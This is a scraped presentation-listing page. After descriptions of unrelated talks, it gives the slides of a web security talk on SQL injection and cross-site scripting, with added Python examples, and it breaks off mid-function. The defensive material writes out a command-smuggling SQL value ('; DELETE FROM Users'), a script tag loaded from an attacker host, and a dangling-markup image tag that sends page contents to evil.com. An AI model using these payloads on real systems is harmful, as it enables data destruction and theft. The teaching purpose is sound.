Have you heard the words: "Why would anyone hack me?" Security is a serious problem that is often taken for granted and neglected by product owners in favour of reliability and availability. In addition, not many developers are aware of the threats and the long-term harm that a simple attack can do. This session covers the most common security threats to web applications, such as XSS, XSRF, XSI, tampering, leakage and SQL injection, and suggests mitigation solutions and coding guidelines.
PHP stands for “PHP: Hypertext Preprocessor”. It is very good for creating dynamic content. PHP is a widely-used, free, and efficient alternative to competitors such as Microsoft's ASP.
This presentation lays out the concept of the traditional web, the improvements web 2.0 have brought about, etc.
I have attempted to explain RIA as well.
The main part of this presentation is centered around ajax, its uses, advantages / disadvantages, framework considerations when using ajax, java-script hijacking, etc.
Hopefully it should be a good read as an intro doc to RIA and Ajax.
About Port Scanning
Used Nmap and Shadow Security Scanner for the best outputs.
A detailed description of performing port scanning, mostly for network administrators.
How to perform it? Why perform it? Where to perform it? The basic factors are taken into consideration and are provided in the presentation.
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
Importance of cyber security in education sector - Seqrite
Data security in the education sector is incredibly important, as the information collected by these institutes can be misused by hackers. This slideshare takes you through the security threats in the education sector.
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications. In proposing defensive measures for cross site scripting, websites validate the user input and determine whether they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
Many defense techniques have been introduced, and even though the coding methods used by developers are evolving to counter cross site scripting techniques, the security threat still persists in many web applications for the following reasons:
• The complexity of implementing the code or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues, etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve... - Okan YILDIZ
Smishing and vishing are phishing attacks that lure victims via SMS messages and voice calls. Both rely on the same emotional appeals employed in traditional phishing scams and are designed to drive you into urgent action. The difference is the delivery method.
“Cyberthieves can apply manipulation techniques to many forms of communication because the underlying principles remain constant,” explains security awareness leader Stu Sjouwerman, CEO of KnowBe4. “Lure victims with bait and then catch them with hooks.”
This was the presentation I made to the @LeedsSharp group in Leeds on 26/02/2015. It focuses on web application security and the steps you need to take to counter most of the threats which are out there today, as determined by the OWASP Top 10. Solutions focus on the MVC.net framework; there is a source code project to go with this presentation with all of the solutions implemented at https://github.com/johnstaveley/SecurityEssentials
Anterior crossbites in primary & mixed dentition Orthodontic courses training... - Indian dental academy
Welcome to Indian Dental Academy
The Indian Dental Academy is the leader in continuing dental education, training dentists in all aspects of dentistry and offering a wide range of certified dental courses in different formats.
Indian Dental Academy has a unique training program and curriculum that provides students with exceptional clinical skills and enables them to return to their office with a high level of confidence and start treating patients.
State of the art comprehensive training, faculty of worldwide repute, and very affordable.
How To Design An All-Hands Meeting Your Employees Actually Want to Attend - Andrew Fayad
Our team has grown fast, and All-Hands meetings have been a key factor in helping us maintain transparency, build engagement, and keep our company culture strong. We take our own experience, and what we've learned from the largest brands to show you how to design and implement an effective All-Hands Meeting at your company.
WAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENT - Ajeesh Mk
This presentation, "Warehousing and storage in supply chain management", covers the topics Warehouse and Storage, Warehouse Management, Functions, Economic and Service Benefit, Principles of Warehouse Design, Kinds of Warehouse, etc.
Bone replacement grafts are widely used to promote bone formation and periodontal regeneration. Xenografts are grafts shared between different species. Currently, there are two available sources of xenografts used as bone replacement grafts in periodontics: bovine bone and natural coral.
Here you can find the slides that accompany my "SPA Secure Coding Guide". This presentation goes through a set of security best practices specially targeted towards developing Angular applications with ASP.Net Web API backends.
It comes with a WebApi example project available on GitHub that provides several code examples of how to defend yourself. The example app is based on the famous "Tour of Heroes" Angular app used throughout the Angular documentation.
It first introduces general threat modelling before explaining the most current types of attacks that ASP.Net Web API applications are vulnerable to.
It is designed to serve as a secure coding reference guide, to help development teams quickly understand Asp.Net Core secure coding practices.
Vulnerabilities in modern web applications - Niyas Nazar
Microsoft PowerPoint presentation for a BTech academic seminar. This seminar discusses penetration testing, penetration testing tools, web application vulnerabilities, the impact of vulnerabilities and security recommendations.
OWASP London - So you thought you were safe using AngularJS.. Think again! - Lewis Ardern
OWASP London talk on AngularJS Security, video here: https://www.youtube.com/watch?v=DcpD5Wh4uOQ&feature=youtu.be&t=4244
Similar talk presented at FluentConf San Jose - https://www.slideshare.net/LewisArdern/so-you-thought-you-were-safe-using-angularjs-think-again
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls - SecuRing
OWASP - Open Web Applications Security Project is a foundation whose goal is to eliminate application security problems. OWASP operates in the "open source" spirit and provides tools, information and knowledge that help raise the level of application security. During the lecture I will briefly present the OWASP Top 10 in its edition for developers, the "Top 10 Proactive Controls", that is, the most important recommendations for avoiding key security mistakes.
Talk given at OWASP Floripa Day - Florianópolis - SC
The talk aims to show the concepts and workings of some features that were added to HTML5, taking into account client-side security aspects. For the highlighted features, attack scenarios were created to illustrate how sensitive information stored in the browser can be obtained, or even how the victim's browser can be used to launch attacks against other systems. By exploiting features present in HTML5, exploitation techniques such as XSS and CSRF become more powerful and efficient, and in some cases it is possible to bypass some restrictions of the Same Origin Policy (SOP).
Making DevSecOps a Reality in your Spring Applications - Hdiv Security
The adoption of DevOps and Continuous Delivery provides tangible benefits such as higher quality, stability, and faster release cadence. One of the most important issues within this adoption is related to security quality tasks that have been traditionally implemented manually.
The talk will demonstrate the security integration of Spring ecosystem demo applications with the Jenkins CI server to jump start continuous and in-depth security testing into the DevOps CI/CD pipeline, via automation and orchestration.
Cybersecurity and Generative AI - for Good and Bad vol.2 - Ivo Andreev
The presentation is an extended, in-depth review of cybersecurity challenges with generative AI, enriched with multiple demos, analysis, responsible AI topics and mitigation steps, and also covers a broader scope beyond the OpenAI service.
Popularity, demand and ease of access to modern generative AI technologies reveal new challenges in the cybersecurity landscape that range from protecting the confidentiality and integrity of data to misuse and abuse of the technology by malicious actors. In this session we elaborate on monitoring and auditing, managing ethical implications and resolving common problems like prompt injections, jailbreaks, utilization in cyberattacks or generating insecure code.
Architecting AI Solutions in Azure for Business - Ivo Andreev
The topic is Azure solution architectures that involve IoT and AI to solve common business domain problems. With a near real time recommender system and object detection with image recognition, we review the architecture, build it from the ground up and illustrate how typical real-world challenges can be addressed.
Cybersecurity Challenges with Generative AI - for Good and Bad - Ivo Andreev
The presentation is an extended, in-depth review of cybersecurity challenges with generative AI, enriched with multiple demos, analysis, responsible AI topics and mitigation steps, and also covers a broader scope beyond the OpenAI service.
Popularity, demand and ease of access to modern generative AI technologies reveal new challenges in the cybersecurity landscape that range from protecting the confidentiality and integrity of data to misuse and abuse of the technology by malicious actors. In this session we elaborate on monitoring and auditing, managing ethical implications and resolving common problems like prompt injections, jailbreaks, utilization in cyberattacks or generating insecure code.
JS-Experts - Cybersecurity for Generative AI - Ivo Andreev
Popularity, demand and ease of access to modern generative AI technologies reveal new challenges in the cybersecurity landscape that range from protecting the confidentiality and integrity of data to misuse and abuse of the technology by malicious actors. In this session we elaborate on monitoring and auditing, managing ethical implications and resolving common problems like prompt injections, jailbreaks, utilization in cyberattacks or generating insecure code.
This is a totally different perspective on LLMs.
How do OpenAI GPT Models Work - Misconceptions and Tips for Developers - Ivo Andreev
Have you ever wondered why GPT models work? Do you ask questions like:
◉ How does GPT work? Why does the same problem receive different answers for different users? Is there a way to improve explainability? ◉ Can a GPT model provide its sources? Why does Bing chat work differently? What are my ways to get better performance and improve completions? ◉ How can I work with data in my enterprise? What practical business cases could a generative AI model be suited to solving?
If you are tired of sessions just scratching the surface of OpenAI GPT, this one will go deeper and answer questions like why, why not and how.
Key Terms; ChatGPT Enterprise; Top Questions; Enterprise Data; Azure Search; Functions; Embeddings; Context Encoding; General Intelligence; Emerging Abilities; Chain of Thought; Plugins; Multimodal with DALL-E; Project Florence
OpenAI GPT in Depth - Questions and Misconceptions - Ivo Andreev
OpenAI GPT in depth – misconceptions and questions you would like answered
Have you ever wondered why GPT models work? Do you ask questions like:
How does GPT work? Why does the same problem receive different answers for different users? Is there a way to improve explainability? Can a GPT model provide its sources? Why does Bing chat work differently? What are my ways to get better performance and improve completions? How can I work with data in my enterprise? What practical business cases could a generative AI model be suited to solving?
If you are tired of sessions just scratching the surface of OpenAI GPT, this one will go deeper and answer questions like why, why not and how.
Cutting Edge Computer Vision for Everyone - Ivo Andreev
Microsoft offers a wide range of tools and advanced solutions to support you in managing computer vision related tasks.
From purely coding approaches with ML.NET, through zero-code ComputerVision.ai, to the advanced and flexible AI service in Azure ML, there is a solution for every need and each type of person.
From running on premises, through managed infrastructure, to fully cloud-based services, the speed of getting to the desired results and the return on investment are guaranteed.
Join this session to get insights about the options, deployment, pricing, pros and cons compared and select the most appropriate tech for your business case.
Collecting and Analysing Spaceborn Data - Ivo Andreev
Communicating with space and analysing satellite data
Azure reached beyond the clouds and brings space-born satellite data to your subscription for analysis and discovering insights.
Satellite as a service, Azure Orbital and a whole new ecosystem signal the ambition to push the limits and explore new opportunities.
In this session we are talking about geospatial AI-based analysis and a comprehensive flow that will allow you to touch a vector of increasing importance for extending the cloud and helping businesses make tactical decisions.
Collecting and Analysing Satellite Data with Azure Orbital - Ivo Andreev
Azure reached beyond the clouds and brings space-born satellite data to your subscription for analysis and discovering insights.
Satellite as a service, Azure Orbital and a whole new ecosystem signal the ambition to push the limits and explore new opportunities.
In this session we are talking about geospatial AI-based analysis and a comprehensive flow that will allow you to touch a vector of increasing importance for extending the cloud and helping businesses make tactical decisions.
Azure Orbital is a fully managed cloud-based ground station as a service that enables you to communicate with your spacecraft or satellites and generate products for customers.
Azure Orbital handles machine-to-machine communication for the user based on the schedule and TLE location of satellites.
Azure software modules decrypt satellite data and prepare it for usage.
Since Nov 2021, Azure Cognitive Service for Language has had a fresh tool, the Language Studio, which is now in Preview. The studio offers multiple prebuilt and preconfigured models which allow you to quickly implement, test and deploy tasks like understanding conversational language, extracting information, classifying text or answering questions. But it goes further and offers multiple features to create, train and deploy custom models that model your data and serve your needs best. Language Studio does that by utilizing workflows that let developers build models without the need for ML knowledge and deploy the results as handy APIs.
Cosmos DB is among the top databases, with its strengths being in a flexible, extremely scalable hosted model, high SLA, low latency, globally distributed, automatic indexing, 2-dimensional redundancy and granular access level. But how does it suit IoT scenarios and for what scenarios is it appropriate?
Forecasting time series powerful and simple - Ivo Andreev
Time series are a sequence of data points positioned in order of time. Time series forecasting has two main purposes: to understand the mechanisms that lead to a rise or fall, and to predict future values. Very often it analyses trends, cyclical events and seasonality, and it has unique importance in economics and business. The quality of predictions can be evaluated only in the future due to temporal dependencies on previous data points, and there are many model types for approximation. In this session we are going to talk about challenges, ways of improvement and a technology stack like ML.NET, ARIMA, Python, Azure ML, Regression and FB Prophet.
Constrained Optimization with Genetic Algorithms and Project Bonsai - Ivo Andreev
“Traditional machine learning requires volumes of labelled data that can be time consuming and expensive to produce.”
“Machine teaching leverages the human capability to decompose and explain concepts to train machine learning models direction (teaching the correct answer is not by showing the data for it, but by using a person to show the answer).”
Project Bonsai is a low code platform for intelligent solutions but with a different perspective on data it allows a completely new approach to tasks, especially when the physical world is involved. Under the hood it combines machine teaching, calibration and optimization to create intelligent control systems using simulations. The teaching curriculum is performed using a new language concept - “Inkling” and training a model is easy and interactive.
Azure security guidelines for developers - Ivo Andreev
Azure security baselines and benchmarks, Security Maturity Model, Industrial Internet Consortium (IIC), Certification, Web Application Firewall, API Management Service
Autonomous Machines with Project Bonsai - Ivo Andreev
Autonomous machines rely on fusion of many technologies to sense, plan, optimize and act as if an intelligent superhuman is in control.
Project Bonsai is a machine teaching service that combines machine learning (ML), calibration and optimization to create intelligent control systems using simulations. The teaching curriculum is performed using a proprietary “Inkling” language close to JavaScript and training a model is easy and interactive. Join this session for a Bonsai jump start and a demo and try it yourself – it is free.
Global Azure Virtual 2021 - Azure Lighthouse - Ivo Andreev
Azure Lighthouse provides capabilities to perform cross-tenant management at scale.
We do this by providing you the ability to view and manage multiple customers from a single context.
Building a scalable business model in the cloud is a real challenge, of incomparable complexity compared to project-based solutions.
If you want to offer a solution in the cloud and onboard multiple customers, the next step would be to consider how you would deploy, maintain and monitor such an environment. What Azure Lighthouse is and how to make your first steps following good practices is the response to that question and the main topic of our session.
Flux QL - Nexgen Management of Time Series Inspired by JS - Ivo Andreev
The time series landscape evolves fast to meet the aggressive challenges in IoT. Influx 2.0 Beta was released in the first days of 2020 and, although already the Top 1 time series database, it introduces a revolutionary change again. InfluxDB 2 is now generally available and its key features originate from Flux, a functional and open source 4th generation analytical programming language inspired by JavaScript. Supported in VS Code, it takes a new approach towards data exploration of time series data and enables some unmatched capabilities like enrichment and filtering of time series data with external data from an RDBMS.
Azure architecture design patterns - proven solutions to common challenges - Ivo Andreev
Building reliable, scalable, secure applications can happen either by following verified design patterns or the hard way, following the trial and error approach. Azure architecture patterns are tested and accepted solutions to common challenges, thus reducing the technical risk to the project by not having to employ a new and untested design. However, most of the patterns are relevant to any distributed system, whether hosted on Azure or on other cloud platforms.
Industrial IoT from the Ground up with Azure and Open Source
IIoT leverages the power of machines and real-time analytics to pick up on industrial inefficiencies and problems sooner, and to save time and money in addition to supporting BI efforts. In a myriad of reference architectures it is up to experience and trial and error to find out what really works in a real-life scenario.
We will review the challenges and solutions in building an IIoT platform from the ground up on the edge between Azure and open source in order to have the best from both worlds. Technical focus will be on IoT Edge, TS Insights, Stream Analytics, IoT Hub, App Insights, Event Grid, Service Bus, ARM templates, Influx DB, Grafana and more - all neatly glued together by Azure Functions.
The Power of Auto ML and How Does it Work - Ivo Andreev
Automated ML is an approach to minimize the need for data science effort by enabling domain experts to build ML models without having deep knowledge of algorithms, mathematics or programming skills. The mechanism works by allowing end-users to simply provide data, and the system automatically does the rest by determining the approach to perform a particular ML task. At first this may sound discouraging to those aiming for the “sexiest job of the 21st century”, the data scientists. However, Auto ML should be considered as democratization of ML, rather than automatic data science.
In this session we will talk about how Auto ML works, how it is implemented by Microsoft and how it could improve the productivity of even professional data scientists.
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt... - Hivelance Technology
Cryptocurrency trading bots are computer programs designed to automate buying, selling, and managing cryptocurrency transactions. These bots utilize advanced algorithms and machine learning techniques to analyze market data, identify trading opportunities, and execute trades on behalf of their users. By automating the decision-making process, crypto trading bots can react to market changes faster than human traders.
Hivelance, a leading provider of cryptocurrency trading bot development services, stands out as the premier choice for crypto traders and developers. Hivelance boasts a team of seasoned cryptocurrency experts and software engineers who deeply understand the crypto market and the latest trends in automated trading. Hivelance leverages the latest technologies and tools in the industry, including advanced AI and machine learning algorithms, to create highly efficient and adaptable crypto trading bots.
Modern design is crucial in today's digital environment, and this is especially true for SharePoint intranets. The design of these digital hubs is critical to user engagement and productivity enhancement. They are the cornerstone of internal collaboration and interaction within enterprises.
Large Language Models and the End of Programming - Matt Welsh
Talk by Matt Welsh at Craft Conference 2024 on the impact that Large Language Models will have on the future of software development. In this talk, I discuss the ways in which LLMs will impact the software industry, from replacing human software developers with AI, to replacing conventional software with models that perform reasoning, computation, and problem-solving.
Developing Distributed High-performance Computing Capabilities of an Open Sci... - Globus
COVID-19 had an unprecedented impact on scientific collaboration. The pandemic and its broad response from the scientific community has forged new relationships among public health practitioners, mathematical modelers, and scientific computing specialists, while revealing critical gaps in exploiting advanced computing systems to support urgent decision making. Informed by our team’s work in applying high-performance computing in support of public health decision makers during the COVID-19 pandemic, we present how Globus technologies are enabling the development of an open science platform for robust epidemic analysis, with the goal of collaborative, secure, distributed, on-demand, and fast time-to-solution analyses to support public health.
Why React Native as a Strategic Advantage for Startup Innovation.pdf - ayushiqss
Do you know that React Native is being increasingly adopted by startups as well as big companies in the mobile app development industry? Big names like Facebook, Instagram, and Pinterest have already integrated this robust open-source framework.
In fact, according to a report by Statista, the number of React Native developers has been steadily increasing over the years, reaching an estimated 1.9 million by the end of 2024. This means that the demand for this framework in the job market has been growing, making it a valuable skill.
But what makes React Native so popular for mobile application development? It offers excellent cross-platform capabilities, among other benefits. With React Native, developers can write code once and run it on both iOS and Android devices, saving time and resources, leading to shorter development cycles and hence a faster time-to-market for your app.
Let’s take the example of a startup, which wanted to release their app on both iOS and Android at once. Through the use of React Native they managed to create an app and bring it into the market within a very short period. This helped them gain an advantage over their competitors because they had access to a large user base who were able to generate revenue quickly for them.
Listen to the keynote address and hear about the latest developments from Rachana Ananthakrishnan and Ian Foster who review the updates to the Globus Platform and Service, and the relevance of Globus to the scientific community as an automation platform to accelerate scientific discovery.
Advanced Flow Concepts Every Developer Should Know - Peter Caitens
Tim Combridge from Sensible Giraffe and Salesforce Ben presents some important tips that all developers should know when dealing with Flows in Salesforce.
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G... - Globus
The U.S. Geological Survey (USGS) has made substantial investments in meeting evolving scientific, technical, and policy driven demands on storing, managing, and delivering data. As these demands continue to grow in complexity and scale, the USGS must continue to explore innovative solutions to improve its management, curation, sharing, delivering, and preservation approaches for large-scale research data. Supporting these needs, the USGS has partnered with the University of Chicago-Globus to research and develop advanced repository components and workflows leveraging its current investment in Globus. The primary outcome of this partnership includes the development of a prototype enterprise repository, driven by USGS Data Release requirements, through exploration and implementation of the entire suite of the Globus platform offerings, including Globus Flow, Globus Auth, Globus Transfer, and Globus Search. This presentation will provide insights into this research partnership, introduce the unique requirements and challenges being addressed and provide relevant project progress.
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart... - Globus
The Earth System Grid Federation (ESGF) is a global network of data servers that archives and distributes the planet's largest collection of Earth system model output for thousands of climate and environmental scientists worldwide. Many of these petabyte-scale data archives are located in proximity to large high-performance computing (HPC) or cloud computing resources, but the primary workflow for data users consists of transferring data and applying computations on a different system. As a part of the ESGF 2.0 US project (funded by the United States Department of Energy Office of Science), we developed pre-defined data workflows, which can be run on demand, capable of applying many data reduction and data analysis steps to the large ESGF data archives, transferring only the resultant analysis (e.g. visualizations, smaller data files). In this talk, we will showcase a few of these workflows, highlighting how Globus Flows can be used for petabyte-scale climate analysis.
Cyaniclab : Software Development Agency Portfolio.pdfCyanic lab
CyanicLab, an offshore custom software development company based in Sweden,India, Finland, is your go-to partner for startup development and innovative web design solutions. Our expert team specializes in crafting cutting-edge software tailored to meet the unique needs of startups and established enterprises alike. From conceptualization to execution, we offer comprehensive services including web and mobile app development, UI/UX design, and ongoing software maintenance. Ready to elevate your business? Contact CyanicLab today and let us propel your vision to success with our top-notch IT solutions.
Enhancing Research Orchestration Capabilities at ORNL.pdfGlobus
Cross-facility research orchestration comes with ever-changing constraints regarding the availability and suitability of various compute and data resources. In short, a flexible data and processing fabric is needed to enable the dynamic redirection of data and compute tasks throughout the lifecycle of an experiment. In this talk, we illustrate how we easily leveraged Globus services to instrument the ACE research testbed at the Oak Ridge Leadership Computing Facility with flexible data and task orchestration capabilities.
Understanding Globus Data Transfers with NetSageGlobus
NetSage is an open privacy-aware network measurement, analysis, and visualization service designed to help end-users visualize and reason about large data transfers. NetSage traditionally has used a combination of passive measurements, including SNMP and flow data, as well as active measurements, mainly perfSONAR, to provide longitudinal network performance data visualization. It has been deployed by dozens of networks world wide, and is supported domestically by the Engagement and Performance Operations Center (EPOC), NSF #2328479. We have recently expanded the NetSage data sources to include logs for Globus data transfers, following the same privacy-preserving approach as for Flow data. Using the logs for the Texas Advanced Computing Center (TACC) as an example, this talk will walk through several different example use cases that NetSage can answer, including: Who is using Globus to share data with my institution, and what kind of performance are they able to achieve? How many transfers has Globus supported for us? Which sites are we sharing the most data with, and how is that changing over time? How is my site using Globus to move data internally, and what kind of performance do we see for those transfers? What percentage of data transfers at my institution used Globus, and how did the overall data transfer performance compare to the Globus users?
Quarkus Hidden and Forbidden ExtensionsMax Andersen
Quarkus has a vast extension ecosystem and is known for its subsonic and subatomic feature set. Some of these features are not as well known, and some extensions are less talked about, but that does not make them less interesting - quite the opposite.
Come join this talk to see some tips and tricks for using Quarkus and some of the lesser known features, extensions and development techniques.
top nidhi software solution freedownloadvrstrong314
This presentation emphasizes the importance of data security and legal compliance for Nidhi companies in India. It highlights how online Nidhi software solutions, like Vector Nidhi Software, offer advanced features tailored to these needs. Key aspects include encryption, access controls, and audit trails to ensure data security. The software complies with regulatory guidelines from the MCA and RBI and adheres to Nidhi Rules, 2014. With customizable, user-friendly interfaces and real-time features, these Nidhi software solutions enhance efficiency, support growth, and provide exceptional member services. The presentation concludes with contact information for further inquiries.
Unleash Unlimited Potential with One-Time Purchase
BoxLang is more than just a language; it's a community. By choosing a Visionary License, you're not just investing in your success, you're actively contributing to the ongoing development and support of BoxLang.
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...informapgpstrackings
Keep tabs on your field staff effortlessly with Informap Technology Centre LLC. Real-time tracking, task assignment, and smart features for efficient management. Request a live demo today!
For more details, visit us : https://informapuae.com/field-staff-tracking/
Check out the webinar slides to learn more about how XfilesPro transforms Salesforce document management by leveraging its world-class applications. For more details, please connect with sales@xfilespro.com
If you want to watch the on-demand webinar, please click here: https://www.xfilespro.com/webinars/salesforce-document-management-2-0-smarter-faster-better/
Globus Connect Server Deep Dive - GlobusWorld 2024Globus
We explore the Globus Connect Server (GCS) architecture and experiment with advanced configuration options and use cases. This content is targeted at system administrators who are familiar with GCS and currently operate—or are planning to operate—broader deployments at their institution.
Globus Connect Server Deep Dive - GlobusWorld 2024
Web Security Threats and Solutions
1. var title = "Web Security Threats and Solutions";
var info = {
    name: "Ivelin Andreev",
    otherOptional: "Security is not for granted",
    location: "Sofia",
    date: "Nov 23, 2014"
};
2. Nov 23, 2014
About me
• Project Manager @
o 12 years professional experience
o .NET Web Development MCPD
o SQL Server 2012 (MCSA)
• Business Interests
o Web Development, SOA, Integration
o Security & Performance Optimization
o Horizon2020, Open BIM, GIS, Mapping
• Contact me
o ivelin.andreev@icb.bg
o www.linkedin.com/in/ivelin
o www.slideshare.net/ivoandreev
3. Web Security is Important
Common misconceptions
• I am using ASP.NET ?!?!
• I am too small to be noticed by crackers
• I am too busy for security, my brand is important
• I am not operating in the financial industry
• Security seal means nothing for customers
• Hosting provider does not matter
4. agenda();
• SQL Injection
• Cross-Site Scripting (XSS)
• Cross-Site Request Forgery (CSRF)
• Cross-Site Script Inclusion (XSSI)
• Parameter Tampering
• Information Leakage
• Distributed Denial of Service
• Demo
5. SQL injection is so old...
Don't developers know any better?
6. SQL Injection
Def: Commands or logic inserted into the SQL data channel
• Common Reasons
o Dynamic query statements and string operations
o Poor programming
• Impact
o Leak or loss of data
o Authentication and authorization
• Impact (you may not have considered)
o Damages limited only by the SQL account permissions
o Windows authentication user rights can be exploited
o Modify server security configuration
o Install backdoors
8. (Pseudo) Solutions
• Replace special symbols (-, ", ')
o Data with special symbols not searchable
o Poor routines can create a vulnerable query (e.g. --'--)
• Smuggling
o Looks like a quote but not a quote - conversion on DB level
o OWASP_IL_2007_SQL_Smuggling.pdf
• NOSQL is not vulnerable
o NOSQL is also vulnerable (i.e. MongoDB with JavaScript)
• Second order attacks
o Validating the request only is not enough
o Data stored in the DB is later used to build other queries
9. Using Parameters (in the wrong manner)
• Dynamic queries (sp_executesql vs. EXEC)
o exec (@sqlString) – executes a T-SQL string
o sp_executesql allows for statements to be parameterized
o sp_executesql is more secure in terms of SQL injection
• Developer believes dynamic SQL is the only option
CREATE PROCEDURE GetUsers @Sort nvarchar(50) AS
DECLARE @sql nvarchar(255)
SET @sql = 'SELECT UserName FROM Users ' + @Sort
EXECUTE sp_executesql @sql
GO
o What if @Sort = '; DELETE FROM Users' - the whole string is executed as a batch
• Safe alternative: accept a sort option, not SQL text
CREATE PROCEDURE GetUsers @Sort int AS
SELECT UserName FROM Users ORDER BY
    CASE WHEN @Sort = 1 THEN Rank() OVER (ORDER BY UserName ASC) END
GO
10. Prevention & Mitigation
• Parameterized queries and prepared statements
o Use parameters where data are expected
o ORMs use parameters (Nhibernate, Entity Framework)
• “The least privilege” principle
o Grant the minimum access rights
o Parameterized queries vs. Stored Procedure permissions
• Positive input validation (Poor)
o Regular expressions / White lists (i.e. alphanumeric)
• IIS Request Query Filtering (Poor)
o filtering-for-sql-injection-on-iis-7-and-later
• SQL injection and DB takeover
o http://ha.ckers.org/sqlinjection/
o (SQL) http://sqlmap.org/; (NOSQL) http://www.nosqlmap.net/
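Added example for slides 9 and 10, not code from the presentation: the same GetUsers idea in Python with sqlite3 (chosen over T-SQL/.NET so it runs stand-alone); the table contents, function names and the ALLOWED_SORTS map are constructed for the demo.

```python
import sqlite3

# Constructed sample rows standing in for the deck's Users table.
SAMPLE_USERS = [("alice",), ("bob",), ("carol",)]

# ORDER BY cannot be a bound parameter, so an untrusted sort option is mapped
# to a fixed SQL fragment (the deck's CASE WHEN @Sort = 1 ... idea).
ALLOWED_SORTS = {1: "UserName ASC", 2: "UserName DESC"}


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (UserName TEXT)")
    con.executemany("INSERT INTO Users VALUES (?)", SAMPLE_USERS)
    con.commit()
    return con


def get_users_vulnerable(con, sort):
    """The deck's first GetUsers: @Sort is glued onto the statement text.
    executescript() runs every statement in the string, the way EXEC /
    sp_executesql run a whole T-SQL batch, so a ';' in sort adds a command.
    Returns the rows left in the table afterwards so the side effect is visible."""
    con.executescript("SELECT UserName FROM Users " + sort)
    return [row[0] for row in con.execute("SELECT UserName FROM Users")]


def get_users_safe(con, sort):
    """The deck's second GetUsers: the caller picks an option number, never SQL text."""
    try:
        order_by = ALLOWED_SORTS[int(sort)]
    except (KeyError, ValueError, TypeError):
        raise ValueError("unknown sort option: %r" % (sort,))
    rows = con.execute("SELECT UserName FROM Users ORDER BY " + order_by)
    return [row[0] for row in rows]


def find_user(con, name):
    """Where data is expected, bind it: the driver never parses the value as SQL."""
    rows = con.execute("SELECT UserName FROM Users WHERE UserName = ?", (name,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    con = make_db()
    print(find_user(con, "alice' OR '1'='1"))                # [] - the quote is just data
    print(get_users_safe(con, 2))                            # ['carol', 'bob', 'alice']
    print(get_users_vulnerable(con, "; DELETE FROM Users"))  # [] - table emptied
```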
11. SQL Injection with Entity Framework
• Entity Framework Raw Queries
string query = "query" + "SQL injection code";
dbContext.Database.SqlQuery<string>(query).ToList();
o Security Considerations (Entity Framework)
• IQueryable
o Can result in untrusted calls
o If provided as a library, can be cast to Context and connection
var orders = repository.GetOrders(5);
var context = ((ObjectQuery)orders).Context;
o Use IEnumerable instead
13. Cross Site Scripting (XSS)
Def: Untrusted content displayed on page unencoded
• Case
o evilHacker injects <script> in http://goodSite.com application context
• By posting HTML form field
• By tricking user to click link with query parameters sent by mail
%3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E
• XSS Source
o Query parameters, HTML form fields
o HTML Attributes (onload, onblur)
o URI requested and displayed in HTTP 404 page
o Data from DB or file system
o 3rd party data - RSS feeds or service
14. XSS – an Underestimated Threat
• Create or access any DOM element
• Hijack cookies, credentials or actions
• Take control over victim machine
• Browser Exploitation Framework (BeEF) Project
o Open source penetration testing tool
o XSS vulnerability allows injection of BeEF
o Victim browser is hooked
o Perform actions/attacks on behalf of the victim
o Exploit system in browser context
15. Persisted XSS
• Attacker stores malicious data on server
• Unvalidated data displayed on page w/o encoding
• Store once – run many
16. Reflected XSS
• Malicious client data is immediately used by server
• Unvalidated data displayed on page w/o encoding
• Requires social engineering
o Convince users to follow a URL (via e-mail or forum comment)
• Detection Tools
o OWASP Xenotix XSS Exploit Framework
o XSS-ME FireFox plugin
17. Client XSS & HTML Injection
• DOM-based XSS
o Malicious data executed as a part of DOM manipulation
o Requires social engineering
document.write("<OPTION value=1>" + document.location.href.substring(…) + "</OPTION>");
• Dangling Markup HTML injection
o Image source w/o closing tag
o On load of image – a request is made to attacker’s site
<img src='http://evil.com/log.cgi?   ← Injected line with a non-terminated parameter
...
<input type="hidden" name="SecretField" value="12345">
...
'   ← Normally-occurring apostrophe somewhere in page text
o HTML leaks to evil site
19. XSS Prevention & Mitigation
• HTML escape then JavaScript escape
• Encode on usage, not appearance
o HttpUtility.HtmlEncode(string)
o HttpUtility.JavaScriptStringEncode(string)
o Microsoft Anti-Cross Site Scripting Library
• Use proven sanitizers
o Blacklist vs. Whitelist
o Valid JavaScript can be created by poor filtering routine
<SscriptCscriptRscriptIscriptPscriptTscript>…
• Check 3rd party resources (i.e. jQuery plugins)
• Analyze places where DOM elements are created
o Use document.createElement() rather than $(obj).html()
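Added example covering the DOM-based document.write() case on slide 17 and the "HTML escape then JavaScript escape" rule on this slide; it is not code from the presentation. It is Python with a hand-rolled js_string_encode (an assumption standing in for HttpUtility.JavaScriptStringEncode) and a constructed payload.

```python
import html


def js_string_encode(value):
    """Escape a value for use inside a JavaScript string literal.
    Written from scratch here; plays the role of HttpUtility.JavaScriptStringEncode
    but is not that implementation. Quotes, backslash and line breaks get backslash
    escapes; <, >, & and control characters become \\uXXXX so the literal can never
    close the <script> block or form a tag."""
    out = []
    for ch in value:
        if ch == "\\":
            out.append("\\\\")
        elif ch in "\"'":
            out.append("\\" + ch)
        elif ch == "\n":
            out.append("\\n")
        elif ch == "\r":
            out.append("\\r")
        elif ch in "<>&" or ord(ch) < 0x20:
            out.append("\\u%04x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


PREFIX = 'document.write("<OPTION value=1>'
SUFFIX = '</OPTION>");'


def option_script_unsafe(value):
    """The slide's document.write() pattern with the value dropped in as-is."""
    return PREFIX + value + SUFFIX


def option_script(value):
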